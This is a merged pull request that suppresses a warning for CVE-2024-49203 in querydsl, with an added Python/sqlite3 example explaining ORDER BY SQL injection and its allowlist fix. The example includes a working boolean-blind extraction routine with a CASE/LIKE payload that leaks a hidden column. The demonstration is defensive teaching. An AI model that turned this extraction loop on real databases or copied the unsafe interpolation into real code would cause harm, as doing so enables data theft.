Suppress warning about CVE-2024-49203 #71

Merged
tozh4728 merged 1 commits from cve-2024-49203 into develop 2025-01-09 12:54:44 +01:00

1 Commits

Author SHA1 Message Date
5540b4160b Suppress warning about CVE-2024-49203
https://nvd.nist.gov/vuln/detail/CVE-2024-49203
https://github.com/querydsl/querydsl/issues/3757

Basically if you allow untrusted user input to be used in the "ORDER BY" clause
you can be vulnerable to SQL injection.

I believe this is nonsense and akin to saying every Java application has a
security vulnerability because JDBC allows you to execute arbitrary SQL if you
do not properly use PreparedStatement with parameters over a string-concatenated
Statement.

Even if this is considered a valid vulnerability we do not, currently, allow
untrusted user input to be used in the "ORDER BY" clause.
2024-12-20 14:13:49 +01:00
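Added example, not code from this repository, from querydsl or from the commit above: the ORDER BY injection the commit message describes and the allowlist that closes it, shown with Python's sqlite3 module standing in for JDBC/querydsl. The schema, rows and the "sort_by" request parameter are constructed for the illustration. The point it demonstrates is why the clause is different from a WHERE value: a placeholder cannot carry a column name or expression, so whatever reaches ORDER BY is parsed as SQL, and even a query that never returns the sensitive column can be turned into a boolean oracle that leaks it row by row.

```python
import sqlite3

# Constructed sample schema and rows (not from the project): a column an
# attacker wants to read but that the listing endpoint never returns.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cr3t-alice');
        INSERT INTO users VALUES (2, 'bob',   's3cr3t-bob');
        """
    )
    return conn


def list_users_unsafe(conn, sort_by):
    """Vulnerable pattern: a sort key taken from the request is interpolated
    into the SQL text. ORDER BY takes an expression, not a bind value, so a
    '?' placeholder cannot protect it and the parser sees the raw input."""
    return conn.execute(f"SELECT id, name FROM users ORDER BY {sort_by}").fetchall()


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def leak_secret(conn, max_len=32):
    """Boolean-based blind extraction through the vulnerable sort parameter.
    The injected CASE sorts ascending by id when the guessed prefix matches
    and by -id otherwise, so the id of the first returned row is the oracle."""
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            guess = known + ch
            payload = (
                "(CASE WHEN (SELECT secret FROM users WHERE id = 1) "
                f"LIKE '{guess}%' THEN id ELSE -id END)"
            )
            if list_users_unsafe(conn, payload)[0][0] == 1:
                known = guess
                break
        else:
            break  # no character extends the prefix: whole value recovered
    return known


# Hardened form: the client picks from a fixed set of column names plus a
# boolean direction; only trusted literals are ever spliced into the SQL.
ALLOWED_SORT_COLUMNS = {"id", "name"}


def is_allowed_sort(sort_by):
    return sort_by in ALLOWED_SORT_COLUMNS


def list_users_safe(conn, sort_by, descending=False):
    if not is_allowed_sort(sort_by):
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    direction = "DESC" if descending else "ASC"
    return conn.execute(
        f'SELECT id, name FROM users ORDER BY "{sort_by}" {direction}'
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", leak_secret(db))
    print("allowlisted sort:", list_users_safe(db, "name", descending=True))
    try:
        list_users_safe(db, "(CASE WHEN 1=1 THEN id END)")
    except ValueError as e:
        print("rejected:", e)
```

The same allowlist-and-direction shape applies to any query builder: map the user-visible sort names to a fixed table of column references on the server side and never pass the request string into the ORDER BY expression itself.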